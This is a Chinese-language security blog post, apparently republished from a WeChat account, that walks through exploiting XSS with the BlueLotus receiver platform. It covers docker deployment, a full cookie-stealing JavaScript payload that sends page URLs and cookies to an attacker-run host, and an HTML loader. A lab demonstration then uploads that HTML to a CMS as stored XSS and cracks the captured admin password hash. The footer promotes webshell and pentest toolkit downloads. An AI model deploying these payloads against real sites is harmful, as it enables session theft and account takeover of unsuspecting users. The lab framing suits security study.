XSS到底应该怎么利用!

admin 2023年12月21日13:57:34评论11 views字数 1921阅读6分24秒阅读模式


声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 

 滑至文末,获取“searchall”下载链接!






一、BlueLotus

大家肯定对xss不陌生了,相信大家只是利用一个弹窗的标签进行验证就结束了,但是具体如何利用应该怎么办呢?

利用BlueLotus可以进行xss的具体利用!

BlueLotus是清华大学蓝莲花战队所写的xss测试平台,XSS测试平台是测试XSS漏洞获取cookie并接收Web页面的平台,XSS可以做JS能做的所有事,包括但不 限于窃取cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息等。


二、docker安装

docker  pull   tanyiqu/bluelotus_xss_receiverdocker  run  -it  -d -P  --name=xssss  tanyiqu/bluelotus_xss_receiver  

XSS到底应该怎么利用!

访问 

http://xx.xx.xx.xx:49158/install.php

点击安装

XSS到底应该怎么利用!

默认点击提交

XSS到底应该怎么利用!

点击登录

XSS到底应该怎么利用!

访问 

http://xx.xx.xx.xx:49158/login.php

输入默认密码bluelotus登录

XSS到底应该怎么利用!

点击我的JS点击下面步骤依次修改

XSS到底应该怎么利用!

默认修改下面得就可以了

var website="http://xx.xx.xx.xx:49158/index.php";(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();

点击生成payload

XSS到底应该怎么利用!

<script src="http://xx.xx.xx.xx:49158/myjs/cookie.js"></script>

构造html

<!DOCTYPE html><html><head>    <title>弹XSS示例</title>                 <script src="http://xx.xx.xx.xx:49158/myjs/cookie.js"></script>            </head><body>    </body></html>


三、靶场复现

这里我用了某个cms系统来进行实战,它是通过触发上传的html,点击上传后的链接触发存储型xss漏洞。

XSS到底应该怎么利用!

这个功能点处发现可以上传html

利用上面所谈到的poc直接打

XSS到底应该怎么利用!

访问上传后的url

http://192.168.112.140/Images/attached/file/2023xxxx/xxxxxxxxxx_44425.html

然后在xss平台会发现

XSS到底应该怎么利用!

获取到cookie

并且拿到账号密码

scuseradmin=Admin; scuserpass=c4ca4238a0b923820dcc509a6f75849b

其中c4ca4238a0b923820dcc509a6f75849bmd5加密 解密得 1

XSS到底应该怎么利用!



注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"





XSS到底应该怎么利用!
点击上方公众号
XSS到底应该怎么利用!
关注我们
XSS到底应该怎么利用!








往期精彩

Armitage|MSF图形界面神器

原创|Searchall3.5.8敏感信息搜索工具







1、公众号后台回复:搜索大法,获取searchall工具下载链接。

2、公众号后台回复:靶场,获取靶场工具网盘下载链接。

3、公众号后台回复:webshell,获取webshell下载链接。

4、公众号后台回复:验证码,获取验证码工具下载链接。

5.公众号后台回复:应急响应,获取应急响应网盘下载链接。

6.公众号后台回复:CS,获取CS渗透工具包网盘下载链接。

原文始发于微信公众号(嗨嗨安全):XSS到底应该怎么利用!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月21日13:57:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS到底应该怎么利用!http://cn-sec.com/archives/2323457.html

发表评论

匿名网友 填写信息